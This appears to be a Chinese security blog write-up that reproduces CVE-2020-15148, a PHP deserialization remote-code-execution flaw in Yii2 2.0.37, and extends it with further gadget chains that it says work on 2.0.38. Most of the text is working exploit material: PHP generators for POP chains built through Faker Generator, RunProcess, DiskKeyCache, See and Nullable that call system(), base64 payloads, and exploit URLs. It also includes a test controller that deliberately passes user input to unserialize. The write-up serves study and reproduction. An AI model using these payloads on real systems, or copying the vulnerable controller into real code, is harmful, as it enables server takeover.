文章目录
环境搭建
下载yii2.0.37版本,https://github.com/yiisoft/yii2/releases/tag/2.0.37,
放在phpstudy的www目录下。
这是一个反序列化利用链,所以还需要一个反序列化的入口点,在controllers目录下创建一个TestController.php
<?php
namespace app\controllers;
use Yii;
use yii\web\Controller;
use yii\filters\VervFilter;
use yii\filters\AccessControl;
use app\models\LoginForm;
class TestController extends \yii\web\Controller
{
public function actionSss($data){
return unserialize(base64_decode($data));
}
}
?>
然后修改/config/web.php文件中的cookieValidationKey的值,随便修改
然后运行命令开启服务
php yii serve
看到如下页面及安装成功
漏洞复现(CVE-2020-15148)
使用poc.php生成poc
<?php
namespace yii\rest{
class CreateAction{
public $checkAccess;
public $id;
public function __construct(){
$this->checkAccess = 'phpinfo';
$this->id = '1';
}
}
}
namespace Faker{
use yii\rest\CreateAction;
class Generator{
protected $formatters;
public function __construct(){
$this->formatters['close'] = [new CreateAction(), 'run'];
}
}
}
namespace yii\db{
use Faker\Generator;
class BatchQueryResult{
private $_dataReader;
public function __construct(){
$this->_dataReader = new Generator;
}
}
}
namespace{
echo base64_encode(serialize(new yii\db\BatchQueryResult));
}
?>
# payload:TzoyMzoieWlpXGRiXEJhdGNoUXVlcnlSZXN1bHQiOjE6e3M6MzY6IgB5aWlcZGJcQmF0Y2hRdWVyeVJlc3VsdABfZGF0YVJlYWRlciI7TzoxNToiRmFrZXJcR2VuZXJhdG9yIjoxOntzOjEzOiIAKgBmb3JtYXR0ZXJzIjthOjE6e3M6NToiY2xvc2UiO2E6Mjp7aTowO086MjE6InlpaVxyZXN0XENyZWF0ZUFjdGlvbiI6Mjp7czoxMToiY2hlY2tBY2Nlc3MiO3M6NzoicGhwaW5mbyI7czoyOiJpZCI7czoxOiIxIjt9aToxO3M6MzoicnVuIjt9fX19
使用payload
http://127.0.0.1/basic/web/index.php?r=test/sss&data=[payload]
漏洞分析
参考:https://blog.csdn.net/rfrder/article/details/113824239
起始点为vendor\yiisoft\yii2\db\BatchQueryResult.php中的destruct方法
我们跟进reset()函数
这里的_dataReader可控,然后又调用了他的close()方法,这里我们可以找找有没有可利用的__call函数,全局搜索call,在\vendor\fzaninotto\faker\src\Faker\Generator.php中找到了合适的,
因为close是无参方法,所以__call中的$method是close,attributes为空。
继续跟踪format函数
这里的formatters也是可控的,也就是说执行什么函数确定了,但是由于调用__call时没有参数所以这里只能执行phpinfo()等,还需要找到合适的无参数函数才能RCE
我们继续全局搜索找无参数可以命令执行的函数
function\s(\w)+?\(\)+(.|\s)+?call_user_func
找到了这个玩意,里面参数都是可控的,可以直接利用
最后反序列化链如下
BatchQueryResult->__destruct()->reset()->close()
↓↓↓
Generator->__call()->format()->getFormatter()
↓↓↓
IndexAction->run()
payload
<?php
namespace yii\rest{
class IndexAction
{
public $checkAccess;
public $id;
public function __construct()
{
$this->checkAccess = "system";
$this->id = "dir";
}
// public function run()
// {
// if ($this->checkAccess) {
// call_user_func($this->checkAccess, $this->id);
// }
// return $this->prepareDataProvider();
// }
}
}
namespace Faker
{
use yii\rest\IndexAction;
class Generator
{
protected $formatters;
public function __construct()
{
//这里调用上一个类的方法的姿势需要学习一波
$this->formatters['close'] = [new IndexAction(), "run"];
}
// public function __call($method, $attributes)
// {
// return $this->format($method, $attributes);
// }
// public function format($formatter, $arguments = array())
// {
// return call_user_func_array($this->getFormatter($formatter), $arguments);
// }
// public function getFormatter($formatter)
// {
// if (isset($this->formatters[$formatter])) {
// return $this->formatters[$formatter];
// }
// foreach ($this->providers as $provider) {
// if (method_exists($provider, $formatter)) {
// $this->formatters[$formatter] = array($provider, $formatter);
// return $this->formatters[$formatter];
// }
// }
// throw new \InvalidArgumentException(sprintf('Unknown formatter "%s"', $formatter));
// }
}
}
namespace yii\db
{
use Faker\Generator;
class BatchQueryResult
{
private $_dataReader;
public function __construct()
{
$this->_dataReader = new Generator;
}
// public function __destruct()
// {
// // make sure cursor is closed
// $this->reset();
// }
// public function reset()
// {
// if ($this->_dataReader !== null) {
// $this->_dataReader->close();
// }
// $this->_dataReader = null;
// $this->_batch = null;
// $this->_value = null;
// $this->_key = null;
// }
}
}
namespace
{
use yii\db\BatchQueryResult;
echo base64_encode(serialize(new BatchQueryResult()));
}
成功:
其他反序列化链1(2.0.38可用)
我们查看2.0.38的commit记录,https://github.com/yiisoft/yii2/commit/9abccb96d7c5ddb569f92d1a748f50ee9b3e2b99,修复方法为阻止yii\db\BatchQueryResult这个类反序列化
我们来看看是如何防止反序列化的,当这个类反序列化时会调用__wakeup()函数,同时使用throw调用BadMethodCallException来抛出一个异常
// 反序列化时调用__wakeup
public function __wakeup()
{
// 通过throw调用BadMethodCallException抛出异常,以此结束反序列化
throw new \BadMethodCallException('Cannot unserialize ' . __CLASS__);
}
BadMethodCallException是PHP标准库里的异常处理类,是PHP自带的__CLASS__是php里的魔术常量,返回该类被定义时的名字,可以参考PHP 魔术常量
这里反序列化链的起始点不能用了,但是后面的链都能用,所以我们再找个__destruct这样的起始点是最快的,使用__destruct\(\)\s+\{([a-zA-Z0-9\s\S]+?)\$this->查找,发现RunProcess类的__destruct可以利用:
这里的$process是可控的,我我们可以用它来调用__call方法,poc如下
注:习惯把调用的函数保留,这样利用链看的清楚一些。
<?php
namespace yii\rest{
class IndexAction
{
public $checkAccess;
public $id;
public function __construct()
{
$this->checkAccess = "system";
$this->id = "dir";
}
// public function run()
// {
// if ($this->checkAccess) {
// call_user_func($this->checkAccess, $this->id);
// }
// return $this->prepareDataProvider();
// }
}
}
namespace Faker
{
use yii\rest\IndexAction;
class Generator
{
protected $formatters;
public function __construct()
{
// 这里调用上一个类的方法的姿势需要学习一波
// 记得将close换为isRunning,这里忘记换了,搞了半天
$this->formatters['isRunning'] = [new IndexAction(), "run"];
}
// public function __call($method, $attributes)
// {
// return $this->format($method, $attributes);
// }
// public function format($formatter, $arguments = array())
// {
// return call_user_func_array($this->getFormatter($formatter), $arguments);
// }
// public function getFormatter($formatter)
// {
// if (isset($this->formatters[$formatter])) {
// return $this->formatters[$formatter];
// }
// foreach ($this->providers as $provider) {
// if (method_exists($provider, $formatter)) {
// $this->formatters[$formatter] = array($provider, $formatter);
// return $this->formatters[$formatter];
// }
// }
// throw new \InvalidArgumentException(sprintf('Unknown formatter "%s"', $formatter));
// }
}
}
namespace Codeception\Extension
{
use Faker\Generator;
class RunProcess
{
private $processes = [];
public function __construct()
{
$this->processes[] = new Generator();
}
// public function __destruct()
// {
// $this->stopProcess();
// }
// public function stopProcess()
// {
// foreach (array_reverse($this->processes) as $process) {
// /** @var $process Process **/
// if (!$process->isRunning()) {
// continue;
// }
// $this->output->debug('[RunProcess] Stopping ' . $process->getCommandLine());
// $process->stop();
// }
// $this->processes = [];
// }
}
}
namespace
{
use Codeception\Extension\RunProcess;
echo base64_encode(serialize(new RunProcess()));
}
payload
http://127.0.0.1/basic/web/index.php?r=test/sss&data=TzozMjoiQ29kZWNlcHRpb25cRXh0ZW5zaW9uXFJ1blByb2Nlc3MiOjE6e3M6NDM6IgBDb2RlY2VwdGlvblxFeHRlbnNpb25cUnVuUHJvY2VzcwBwcm9jZXNzZXMiO2E6MTp7aTowO086MTU6IkZha2VyXEdlbmVyYXRvciI6MTp7czoxMzoiACoAZm9ybWF0dGVycyI7YToxOntzOjk6ImlzUnVubmluZyI7YToyOntpOjA7TzoyMDoieWlpXHJlc3RcSW5kZXhBY3Rpb24iOjI6e3M6MTE6ImNoZWNrQWNjZXNzIjtzOjY6InN5c3RlbSI7czoyOiJpZCI7czozOiJkaXIiO31pOjE7czozOiJydW4iO319fX19
其他反序列化链2(2.0.38可用)
DiskKeyCache.php的Swift_KeyCache_DiskKeyCache类同样可以利用
继续跟踪clearAll()函数
虽然没有找到可以触发__call的地方,但是存在字符串的拼接,可以找有没有可利用的__toString(),使用__toString()[\s\S]+?\$this->[\s\S]+?->[\s\S]+?\(\)全局搜索,可以找到很多,先试试其他师傅说的see.php中的
最后反序列化链如下
Swift_KeyCache_DiskKeyCache->clearAll()
↓↓↓
See->__toString()
↓↓↓
Generator->__call()->format()->getFormatter()
↓↓↓
IndexAction->run()
poc
<?php
namespace yii\rest{
class IndexAction
{
public $checkAccess;
public $id;
public function __construct()
{
$this->checkAccess = "system";
$this->id = "whoami";
}
// public function run()
// {
// if ($this->checkAccess) {
// call_user_func($this->checkAccess, $this->id);
// }
// return $this->prepareDataProvider();
// }
}
}
namespace Faker
{
use yii\rest\IndexAction;
class Generator
{
protected $formatters;
public function __construct()
{
// 这里调用上一个类的方法的姿势需要学习一波
// 记得将close换为isRunning,这里忘记换了,搞了半天
$this->formatters['render'] = [new IndexAction(), "run"];
}
// public function __call($method, $attributes)
// {
// return $this->format($method, $attributes);
// }
// public function format($formatter, $arguments = array())
// {
// return call_user_func_array($this->getFormatter($formatter), $arguments);
// }
// public function getFormatter($formatter)
// {
// if (isset($this->formatters[$formatter])) {
// return $this->formatters[$formatter];
// }
// foreach ($this->providers as $provider) {
// if (method_exists($provider, $formatter)) {
// $this->formatters[$formatter] = array($provider, $formatter);
// return $this->formatters[$formatter];
// }
// }
// throw new \InvalidArgumentException(sprintf('Unknown formatter "%s"', $formatter));
// }
}
}
namespace phpDocumentor\Reflection\DocBlock\Tags{
use Faker\Generator;
final class See
{
protected $description;
public function __construct()
{
$this->description = new Generator();
}
// public function __toString() : string
// {
// return $this->refers . ($this->description ? ' ' . $this->description->render() : '');
// }
}
}
namespace{
use phpDocumentor\Reflection\DocBlock\Tags\See;
class Swift_KeyCache_DiskKeyCache
{
private $path;
private $keys = [];
public function __construct()
{
$this->path = new See();
$this->keys = ["hello"];
}
// public function __destruct()
// {
// foreach ($this->keys as $nsKey => $null) {
// $this->clearAll($nsKey);
// }
// }
// public function clearAll($nsKey)
// {
// if (array_key_exists($nsKey, $this->keys)) {
// foreach ($this->keys[$nsKey] as $itemKey => $null) {
// $this->clearKey($nsKey, $itemKey);
// }
// if (is_dir($this->path.'/'.$nsKey)) {
// rmdir($this->path.'/'.$nsKey);
// }
// unset($this->keys[$nsKey]);
// }
// }
}
echo base64_encode(serialize(new Swift_KeyCache_DiskKeyCache()));
}
# TzoyNzoiU3dpZnRfS2V5Q2FjaGVfRGlza0tleUNhY2hlIjoyOntzOjMzOiIAU3dpZnRfS2V5Q2FjaGVfRGlza0tleUNhY2hlAHBhdGgiO086NDI6InBocERvY3VtZW50b3JcUmVmbGVjdGlvblxEb2NCbG9ja1xUYWdzXFNlZSI6MTp7czoxNDoiACoAZGVzY3JpcHRpb24iO086MTU6IkZha2VyXEdlbmVyYXRvciI6MTp7czoxMzoiACoAZm9ybWF0dGVycyI7YToxOntzOjY6InJlbmRlciI7YToyOntpOjA7TzoyMDoieWlpXHJlc3RcSW5kZXhBY3Rpb24iOjI6e3M6MTE6ImNoZWNrQWNjZXNzIjtzOjY6InN5c3RlbSI7czoyOiJpZCI7czo2OiJ3aG9hbWkiO31pOjE7czozOiJydW4iO319fX1zOjMzOiIAU3dpZnRfS2V5Q2FjaGVfRGlza0tleUNhY2hlAGtleXMiO2E6MTp7aTowO3M6NToiaGVsbG8iO319
payload
http://127.0.0.1/basic/web/index.php?r=test/sss&data=TzoyNzoiU3dpZnRfS2V5Q2FjaGVfRGlza0tleUNhY2hlIjoyOntzOjMzOiIAU3dpZnRfS2V5Q2FjaGVfRGlza0tleUNhY2hlAHBhdGgiO086NDI6InBocERvY3VtZW50b3JcUmVmbGVjdGlvblxEb2NCbG9ja1xUYWdzXFNlZSI6MTp7czoxNDoiACoAZGVzY3JpcHRpb24iO086MTU6IkZha2VyXEdlbmVyYXRvciI6MTp7czoxMzoiACoAZm9ybWF0dGVycyI7YToxOntzOjY6InJlbmRlciI7YToyOntpOjA7TzoyMDoieWlpXHJlc3RcSW5kZXhBY3Rpb24iOjI6e3M6MTE6ImNoZWNrQWNjZXNzIjtzOjY6InN5c3RlbSI7czoyOiJpZCI7czo2OiJ3aG9hbWkiO31pOjE7czozOiJydW4iO319fX1zOjMzOiIAU3dpZnRfS2V5Q2FjaGVfRGlza0tleUNhY2hlAGtleXMiO2E6MTp7aTowO3M6NToiaGVsbG8iO319
自己找个__toString()
这里自己找了下发现Nullable.php中的__toString()也可以
poc:
<?php
namespace yii\rest{
class IndexAction
{
public $checkAccess;
public $id;
public function __construct()
{
$this->checkAccess = "system";
$this->id = "whoami";
}
}
}
namespace Faker
{
use yii\rest\IndexAction;
class Generator
{
protected $formatters;
public function __construct()
{
// 这里调用上一个类的方法的姿势需要学习一波
// 记得将close换为isRunning,这里忘记换了,搞了半天
$this->formatters['__toString'] = [new IndexAction(), "run"];
}
}
}
namespace phpDocumentor\Reflection\Types{
use Faker\Generator;
final class Nullable
{
private $realType;
public function __construct()
{
$this->realType = new Generator();
}
}
}
namespace{
use phpDocumentor\Reflection\Types\Nullable;
class Swift_KeyCache_DiskKeyCache
{
private $path;
private $keys = [];
public function __construct()
{
$this->path = new Nullable();
$this->keys = ["hello"];
}
}
echo base64_encode(serialize(new Swift_KeyCache_DiskKeyCache()));
}
# TzoyNzoiU3dpZnRfS2V5Q2FjaGVfRGlza0tleUNhY2hlIjoyOntzOjMzOiIAU3dpZnRfS2V5Q2FjaGVfRGlza0tleUNhY2hlAHBhdGgiO086Mzk6InBocERvY3VtZW50b3JcUmVmbGVjdGlvblxUeXBlc1xOdWxsYWJsZSI6MTp7czo0OToiAHBocERvY3VtZW50b3JcUmVmbGVjdGlvblxUeXBlc1xOdWxsYWJsZQByZWFsVHlwZSI7TzoxNToiRmFrZXJcR2VuZXJhdG9yIjoxOntzOjEzOiIAKgBmb3JtYXR0ZXJzIjthOjE6e3M6MTA6Il9fdG9TdHJpbmciO2E6Mjp7aTowO086MjA6InlpaVxyZXN0XEluZGV4QWN0aW9uIjoyOntzOjExOiJjaGVja0FjY2VzcyI7czo2OiJzeXN0ZW0iO3M6MjoiaWQiO3M6Njoid2hvYW1pIjt9aToxO3M6MzoicnVuIjt9fX19czozMzoiAFN3aWZ0X0tleUNhY2hlX0Rpc2tLZXlDYWNoZQBrZXlzIjthOjE6e2k6MDtzOjU6ImhlbGxvIjt9fQ==
然后下面这些也可以
其他反序列化链3(2.0.37可用)
这条链不适用于2.0.38,是2.0.37的另外一条链
BatchQueryResult->__destruct()->reset()->close()
第一条链到close()函数时是找__call()函数,这条链直接找可利用的close()
这个没复现成功,poc
<?php
namespace yii\rest{
class IndexAction{
public $checkAccess;
public $id;
public function __construct(){
$this->checkAccess = 'system';
$this->id = 'whoami';
}
}
}
namespace yii\db{
use yii\web\DbSession;
class BatchQueryResult
{
private $_dataReader;
public function __construct(){
$this->_dataReader=new DbSession();
}
}
}
namespace yii\web{
use yii\rest\IndexAction;
class DbSession
{
public $writeCallback;
public function __construct(){
$a=new IndexAction();
$this->writeCallback=[$a,'run'];
}
}
}
namespace{
use yii\db\BatchQueryResult;
echo base64_encode(serialize(new BatchQueryResult()));
}
# TzoyMzoieWlpXGRiXEJhdGNoUXVlcnlSZXN1bHQiOjE6e3M6MzY6IgB5aWlcZGJcQmF0Y2hRdWVyeVJlc3VsdABfZGF0YVJlYWRlciI7TzoxNzoieWlpXHdlYlxEYlNlc3Npb24iOjE6e3M6MTM6IndyaXRlQ2FsbGJhY2siO2E6Mjp7aTowO086MjA6InlpaVxyZXN0XEluZGV4QWN0aW9uIjoyOntzOjExOiJjaGVja0FjY2VzcyI7czo2OiJzeXN0ZW0iO3M6MjoiaWQiO3M6Njoid2hvYW1pIjt9aToxO3M6MzoicnVuIjt9fX0=